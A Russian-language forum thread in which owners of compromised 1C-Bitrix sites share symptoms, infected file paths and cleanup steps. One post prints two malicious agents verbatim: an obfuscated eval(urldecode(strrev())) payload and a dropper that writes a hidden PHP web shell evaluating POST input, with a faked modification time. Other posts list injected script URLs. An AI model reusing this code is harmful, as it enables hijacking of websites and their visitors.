Взломаны сайты в честь дня конституции украины

почистил prolog и core.js, несколько дней нормально все было,

сейчас опять в этих файлах ридирект на скрипт,

никто не разобрался где дырка? модуль vote не стоит, подскажите, куда копать??

вообще судя по файлам -  это не через vote, думаю это что то из более раннего

с чего вы взяли что сайт мне не нужен?


1. лицензия куплена

2. не отключена
3. работает

хотя для чего я вам это пишу? от вас навряд-ли я что-то полезное почерпну...

У вас рабочая лицензия, все обновлено и при этом сайт ломают?

Странная ситуация. Что говорит об этом суппорт?

точно такие же файлы встраиваются в пролог,

а вы в этом файле (bitrix/js/main/core/core.js) удаляли вот эту вот гадость? просто в первый раз почистил prolog.php, но этого оказалось мало, сейчас откатился, почистил и core.js, вот не знаю, насколько это поможет...

У кого проблема с добавлением js-кода - проверьте наличие файлов и удалите их.

/bitrix/components/bitrix/main.file.input/main.php
/bitrix/components/bitrix/main.file.input/set_list.php

Второго файла вероятно не будет, а в первом - мишура для отвлечения внимания (основа - код из file.php), вызов system() в конструкторе с параметром из заголовка запроса + создание объекта данного класса после определения класса. Наличие данного файла не предполагается в ядре

спасибо тебе добрый человек!!! все действительно так как ты сказал,  

дата изменения этой папки как-раз на момент перед взломом, один из файлов на месте,

но дата как и у всех остальных в папке, а второго нет, видимо самоудалился...

main.php не стал удалять пока, очистил внутренности, будем посмотреть......

Тоже подверглись взлому. помимо упомянутого файла появились 2 агента
1. $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%­03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%­f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%­f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%­f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%­a7%86%35%05%b6%25%97%f4%07%03%c6%94%77%54%23%d4%03%55%d6%a5%­a7%14%a6%a5%97%76%44%f4%97%36%a6%95%43%55%a6%95%b6%86%a7%d4%­a6%86%45%95%23%d4%23%d4%b6%65%44%d4%b6%e4%d6%94%26%65%55%35%­c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%­23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%­03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%­77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%­c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%­f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%­45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%­47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));

2. $fName = str_replace('/modules/main/classes/mysql', '', dirname(__FILE__)).'/admin/composite_seminarians.php'; $files = scandir(dirname($fName)); file_put_contents($fName, '<?php V47dc049a84b(@$_POST[\'c3a1e58\']); function V47dc049a84b($I018d087c){ @eval($I018d087c); } ?> '); touch($fName, filemtime(dirname($fName).'/'.$files[2]));

У меня на 2х из 3х сайтах были обнаружены следы взлома. Все 3 - Timeweb

Такая же беда периодически встраивается  https://techmestore.pw/jquery-ui.js  -  https://code.jquery-uii.com/jquery-ui.js
удалил руками.

У меня используются абсолютно самописные шаблоны, которые делал сам еще бог знает как давно. (2 из 3х заразились) Так что дело точно не в шаблонах. По хостам - просто обмениваемся информацией - а вдруг. Если и на других хостах, значит дело не в хосте

Обновить сайт до последней версии битрикс?